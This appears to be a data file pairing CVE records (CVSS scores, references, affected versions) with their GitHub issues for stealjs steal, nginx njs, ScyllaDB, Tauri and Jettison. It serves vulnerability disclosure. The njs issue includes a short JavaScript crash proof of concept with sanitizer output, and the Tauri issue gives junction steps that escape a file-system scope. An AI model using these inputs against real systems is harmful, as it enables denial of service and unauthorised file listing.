"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/main.js#L3497"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/main.js#L3507"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/issues/1531"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/main.js#L3497"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/main.js#L3507"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/issues/1531"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:stealjs:steal:2.2.4:*:*:*:*:node.js:*:*",
"matchCriteriaId": "3819AF82-351A-415D-B7D8-60208158D5E3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"1333"
] | 1333 | https://github.com/stealjs/steal/issues/1531 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"stealjs",
"steal"
] | A Regular Expression Denial of Service (ReDoS) flaw was found in stealjs steal 2.2.4 via the source and sourceWithComments variable in main.js.
The ReDoS vulnerability can be mitigated with several best practices described here: https://snyk.io/blog/redos-and-catastrophic-backtracking/
| [CVE-2022-37262]/ReDos found in main.js | https://api.github.com/repos/stealjs/steal/issues/1531/comments | 0 | 2022-09-14T09:33:46Z | 2022-09-14T09:33:46Z | https://github.com/stealjs/steal/issues/1531 | 1,372,664,571 | 1,531 | 4,151 |
CVE-2022-37264 | 2022-09-15T16:15:10.387 | Prototype pollution vulnerability in stealjs steal 2.2.4 via the optionName variable in main.js. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/main.js#L2194"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/main.js#L647"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/issues/1533"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/main.js#L2194"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/main.js#L647"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/issues/1533"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:stealjs:steal:2.2.4:*:*:*:*:node.js:*:*",
"matchCriteriaId": "3819AF82-351A-415D-B7D8-60208158D5E3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"1321"
] | 1321 | https://github.com/stealjs/steal/issues/1533 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"stealjs",
"steal"
] | Prototype pollution vulnerability in stealjs steal 2.2.4 via the optionName variable in main.js.
The prototype pollution vulnerability can be mitigated with several best practices described here: https://learn.snyk.io/lessons/prototype-pollution/javascript/
| [CVE-2022-37264]/ Prototype pollution found in main.js | https://api.github.com/repos/stealjs/steal/issues/1533/comments | 0 | 2022-09-14T09:40:44Z | 2022-09-14T09:40:44Z | https://github.com/stealjs/steal/issues/1533 | 1,372,674,742 | 1,533 | 4,152 |
CVE-2022-38890 | 2022-09-15T16:15:10.687 | Nginx NJS v0.7.7 was discovered to contain a segmentation violation via njs_utf8_next at src/njs_utf8.h | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/nginx/njs/issues/569"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/nginx/njs/issues/569"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:f5:njs:0.7.7:*:*:*:*:*:*:*",
"matchCriteriaId": "B99556AB-3BAC-4553-8CDC-17292CF06AA8",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"125"
] | 125 | https://github.com/nginx/njs/issues/569 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"nginx",
"njs"
] | the call stack is different with https://github.com/nginx/njs/issues/522
```
Environment
commit: 569292e0a74f2b1ec09566f3329f82bdd0d58e87
version: 0.7.7
Build :
./configure --cc=clang --address-sanitizer=YES
make
```
Poc
```js
function placeholder(){}
function main() {
var v2 = String.fromCharCode(-950135168);
var v3 = v2.trimEnd(String);
var v8 = 512 >>> "multiline";
var v9 = String.fromCharCode(788580.490736339);
var v10 = v9.padEnd(v8,v3);
var v11 = v10.lastIndexOf(788580.490736339);
}
main();
```
Asan
```
AddressSanitizer:DEADLYSIGNAL
=================================================================
==1550478==ERROR: AddressSanitizer: SEGV on unknown address 0x6170bebedece (pc 0x000000505f0e bp 0x7fff88dc8f70 sp 0x7fff88dc8e40 T0)
==1550478==The signal is caused by a READ memory access.
#0 0x505f0e in njs_utf8_next /data/test-njs/njs/src/njs_utf8.h:54:20
#1 0x505f0e in njs_string_offset /data/test-njs/njs/src/njs_string.c:2545:17
#2 0x505f0e in njs_string_prototype_last_index_of /data/test-njs/njs/src/njs_string.c:2309:13
#3 0x53df7c in njs_function_native_call /data/test-njs/njs/src/njs_function.c:742:11
#4 0x4e5117 in njs_vmcode_interpreter /data/test-njs/njs/src/njs_vmcode.c:801:23
#5 0x53d466 in njs_function_lambda_call /data/test-njs/njs/src/njs_function.c:693:11
#6 0x4e5117 in njs_vmcode_interpreter /data/test-njs/njs/src/njs_vmcode.c:801:23
#7 0x4df05a in njs_vm_start /data/test-njs/njs/src/njs_vm.c:543:11
#8 0x4c7f89 in njs_process_script /data/test-njs/njs/src/njs_shell.c:919:19
#9 0x4c73b1 in njs_process_file /data/test-njs/njs/src/njs_shell.c:648:11
#10 0x4c73b1 in main /data/test-njs/njs/src/njs_shell.c:314:15
#11 0x7f75066e7082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
#12 0x41daad in _start (/data/test-njs/njs/build/njs+0x41daad)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /data/test-njs/njs/src/njs_utf8.h:54:20 in njs_utf8_next
==1550478==ABORTING
```
Credit
ret2ddme
| Another way to trigger SEGV in njs_utf8_next cause oob read | https://api.github.com/repos/nginx/njs/issues/569/comments | 2 | 2022-08-25T02:58:03Z | 2022-09-02T00:51:09Z | https://github.com/nginx/njs/issues/569 | 1,350,249,226 | 569 | 4,153 |
CVE-2022-37260 | 2022-09-15T19:15:09.847 | A Regular Expression Denial of Service (ReDoS) flaw was found in stealjs steal 2.2.4 via the input variable in main.js. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/main.js#L2490"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/main.js#L3344"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/issues/1529"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/main.js#L2490"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/main.js#L3344"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/issues/1529"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:stealjs:steal:2.2.4:*:*:*:*:node.js:*:*",
"matchCriteriaId": "3819AF82-351A-415D-B7D8-60208158D5E3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"1333"
] | 1333 | https://github.com/stealjs/steal/issues/1529 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"stealjs",
"steal"
] | A Regular Expression Denial of Service (ReDoS) flaw was found in stealjs steal 2.2.4 via the input variable in main.js.
The ReDoS vulnerability can be mitigated with several best practices described here:
https://snyk.io/blog/redos-and-catastrophic-backtracking/
| [CVE-2022-37260]/ReDos found in main.js | https://api.github.com/repos/stealjs/steal/issues/1529/comments | 0 | 2022-09-14T09:25:55Z | 2022-09-14T09:25:55Z | https://github.com/stealjs/steal/issues/1529 | 1,372,653,654 | 1,529 | 4,154 |
CVE-2022-29240 | 2022-09-15T22:15:11.220 | Scylla is a real-time big data database that is API-compatible with Apache Cassandra and Amazon DynamoDB. When decompressing CQL frame received from user, Scylla assumes that user-provided uncompressed length is correct. If user provides fake length, that is greater than the real one, part of decompression buffer won't be overwritten, and will be left uninitialized. This can be exploited in several ways, depending on the privileges of the user. 1. The main exploit is that an attacker with access to CQL port, but no user account, can bypass authentication, but only if there are other legitimate clients making connections to the cluster, and they use LZ4. 2. Attacker that already has a user account on the cluster can read parts of uninitialized memory, which can contain things like passwords of other users or fragments of other queries / results, which leads to authorization bypass and sensitive information disclosure. The bug has been patched in the following versions: Scylla Enterprise: 2020.1.14, 2021.1.12, 2022.1.0. Scylla Open Source: 4.6.7, 5.0.3. Users unable to upgrade should make sure none of their drivers connect to cluster using LZ4 compression, and that Scylla CQL port is behind firewall. Additionally make sure no untrusted client can connect to Scylla, by setting up authentication and applying workarounds from previous point (firewall, no lz4 compression). | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 5.9,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/scylladb/scylla/security/advisories/GHSA-25pq-rrqm-6fmr"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/scylladb/scylladb/commit/1c2eef384da439b0457b6d71c7e37d7268e471cb"
},
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/scylladb/scylladb/issues/11476"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/scylladb/scylla/security/advisories/GHSA-25pq-rrqm-6fmr"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/scylladb/scylladb/commit/1c2eef384da439b0457b6d71c7e37d7268e471cb"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/scylladb/scylladb/issues/11476"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:scylladb:scylla:*:*:*:*:open_source:*:*:*",
"matchCriteriaId": "62049391-A8C3-4963-B692-B9D0EBD24754",
"versionEndExcluding": "4.6.7",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:scylladb:scylla:*:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "3D30E6EF-8EDA-467A-B467-0DD00916F5BE",
"versionEndExcluding": "2020.1.14",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:scylladb:scylla:*:*:*:*:open_source:*:*:*",
"matchCriteriaId": "3BD1B169-D009-459A-AA09-60835C7712EA",
"versionEndExcluding": "5.0.3",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "5.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:scylladb:scylla:*:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "25942345-FCBA-4788-B0CA-4E6C247C9862",
"versionEndExcluding": "2021.1.12",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2021.1.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"908"
] | 908 | https://github.com/scylladb/scylladb/issues/11476 | [
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"scylladb",
"scylladb"
] | We return the wrong size, which can lead to crashes or other undefined behavior.
This is [CVE-2022-29240](https://github.com/scylladb/scylladb/security/advisories/GHSA-25pq-rrqm-6fmr). | Undefined behavior in transport decompression code | https://api.github.com/repos/scylladb/scylladb/issues/11476/comments | 1 | 2022-09-07T07:57:30Z | 2022-11-16T19:23:33Z | https://github.com/scylladb/scylladb/issues/11476 | 1,364,252,689 | 11,476 | 4,155 |
CVE-2022-39215 | 2022-09-15T22:15:11.527 | Tauri is a framework for building binaries for all major desktop platforms. Due to missing canonicalization when `readDir` is called recursively, it was possible to display directory listings outside of the defined `fs` scope. This required a crafted symbolic link or junction folder inside an allowed path of the `fs` scope. No arbitrary file content could be leaked. The issue has been resolved in version 1.0.6 and the implementation now properly checks if the requested (sub) directory is a symbolic link outside of the defined `scope`. Users are advised to upgrade. Users unable to upgrade should disable the `readDir` endpoint in the `allowlist` inside the `tauri.conf.json`. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 8.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.7,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/tauri-apps/tauri/issues/4882"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tauri-apps/tauri/pull/5123"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tauri-apps/tauri/pull/5123/commits/1f9b9e8d26a2c915390323e161020bcb36d44678"
},
{
"source": "security-advisories@github.com",
"tags": [
"Mitigation",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tauri-apps/tauri/security/advisories/GHSA-28m8-9j7v-x499"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/tauri-apps/tauri/issues/4882"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tauri-apps/tauri/pull/5123"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tauri-apps/tauri/pull/5123/commits/1f9b9e8d26a2c915390323e161020bcb36d44678"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mitigation",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tauri-apps/tauri/security/advisories/GHSA-28m8-9j7v-x499"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:tauri:tauri:*:*:*:*:*:*:*:*",
"matchCriteriaId": "BE5A2510-1D82-4D06-BFDC-08FA3942EDC8",
"versionEndExcluding": "1.0.6",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"59"
] | 59 | https://github.com/tauri-apps/tauri/issues/4882 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"tauri-apps",
"tauri"
] | ### Describe the bug
When a junction is created in the $APP Base directory on windows
eg. `mklink /J C:\Users\<user>\AppData\Roaming\<identifier>\TestFolder C:\Dev\TestFolder`)
The folder is accessible together with all files and folders inside using fs if read from the root directory
`const entries = await readDir('', { dir: BaseDirectory.App, recursive: true });`
But when trying to read the folder directly using
`const entries = await readDir('TestFolder', { dir: BaseDirectory.App, recursive: true });`
it fails with an error
`Uncaught (in promise) path not allowed on the configured scope: C:\Users\<user>\AppData\Roaming\<identifier>\TestFolder`
### Reproduction
1. Create Junction in $APP directory
2. Try to access that directory recursively with readDir with empty dir parameter
3. Folder and its contents can be read
4. Try to access that directory again with readDir but with the name of the directory as dir parameter
### Expected behavior
I would expect to either not be able to access the folder at all, or be able to access it directly as well if it is accessible from root recursively.
### Platform and versions
```
Environment
› OS: Windows 10.0.19044 X64
› Webview2: 103.0.1264.77
› MSVC:
- Visual Studio Community 2019
- Visual Studio Build Tools 2019
› Node.js: 16.13.1
› npm: 8.1.2
› pnpm: 6.11.0
› yarn: 1.22.15
› rustup: 1.25.1
› rustc: 1.62.1
› cargo: 1.62.1
› Rust toolchain: stable-x86_64-pc-windows-msvc
Packages
› @tauri-apps/cli [NPM]: 1.0.5
› @tauri-apps/api [NPM]: 1.0.2
› tauri [RUST]: 1.0.5,
› tauri-build [RUST]: 1.0.4,
› tao [RUST]: 0.12.2,
› wry [RUST]: 0.19.0,
App
› build-type: bundle
› CSP: unset
› distDir: ../dist
› devPath: http://localhost:5173/
› framework: Vue.js
App directory structure
├─ .vscode
├─ dist
├─ node_modules
├─ public
├─ src
└─ src-tauri
```
### Stack trace
_No response_
### Additional context
_No response_ | [bug] Accessing junction folder from within $APP folder on Windows | https://api.github.com/repos/tauri-apps/tauri/issues/4882/comments | 0 | 2022-08-07T18:06:13Z | 2022-09-08T13:59:07Z | https://github.com/tauri-apps/tauri/issues/4882 | 1,331,083,809 | 4,882 | 4,156 |
CVE-2022-40149 | 2022-09-16T10:15:09.677 | Those using Jettison to parse untrusted XML or JSON data may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow. This effect may support a denial of service attack. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "cve-coordination@google.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve-coordination@google.com",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=46538"
},
{
"source": "cve-coordination@google.com",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/jettison-json/jettison/issues/45"
},
{
"source": "cve-coordination@google.com",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00011.html"
},
{
"source": "cve-coordination@google.com",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2023/dsa-5312"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=46538"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/jettison-json/jettison/issues/45"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00011.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2023/dsa-5312"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jettison_project:jettison:*:*:*:*:*:*:*:*",
"matchCriteriaId": "56D361BD-D04F-425F-A8EB-4D389BD32429",
"versionEndExcluding": null,
"versionEndIncluding": "1.4.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*",
"matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/jettison-json/jettison/issues/45 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"jettison-json",
"jettison"
] | Dear Jettison maintainers,
Multiple bugs were found during fuzzing by [Jazzer](https://github.com/CodeIntelligenceTesting/jazzer) in Jettison, for example [[Out of memory](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=46549) and [Stackoverflow](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=46538)]. We would like to provide you with access to the bugs at Google OSS-Fuzz before they get publicly disclosed.
What do we need from you?
We need an email address that is associated with a Google Account as per [Accepting new projects](https://google.github.io/oss-fuzz/getting-started/accepting-new-projects/). In the past we have already contacted you during the onboarding of your project, but the request was rejected or no email was shared with us.
What do you get by sharing your email address?
When a bug is found, you will receive an email that will provide you with access to ClusterFuzz, crash reports, code coverage reports and fuzzer statistics. Each finding will have a crashing input that you can use to easily reproduce the bug.
Attention: All bug details will be made public automatically after the deadline of 90 days has exceeded or after the fix is released. For projects without maintainers we will do our best to support the disclosure process. Depending on our resources we will try to create an issues for every bug in your public issues tracker. In addition, we will request CVEs for security related vulnerabilities.
Please let me know if you have any questions regarding fuzzing or the OSS-Fuzz integration.
Thank you for your reading and hope to hear from you soon! | New OSS-Fuzz Findings in Jettison | https://api.github.com/repos/jettison-json/jettison/issues/45/comments | 10 | 2022-08-03T14:40:56Z | 2023-01-01T12:41:39Z | https://github.com/jettison-json/jettison/issues/45 | 1,327,327,641 | 45 | 4,157 |
CVE-2022-40151 | 2022-09-16T10:15:09.817 | Those using Xstream to seralize XML data may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow. This effect may support a denial of service attack. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
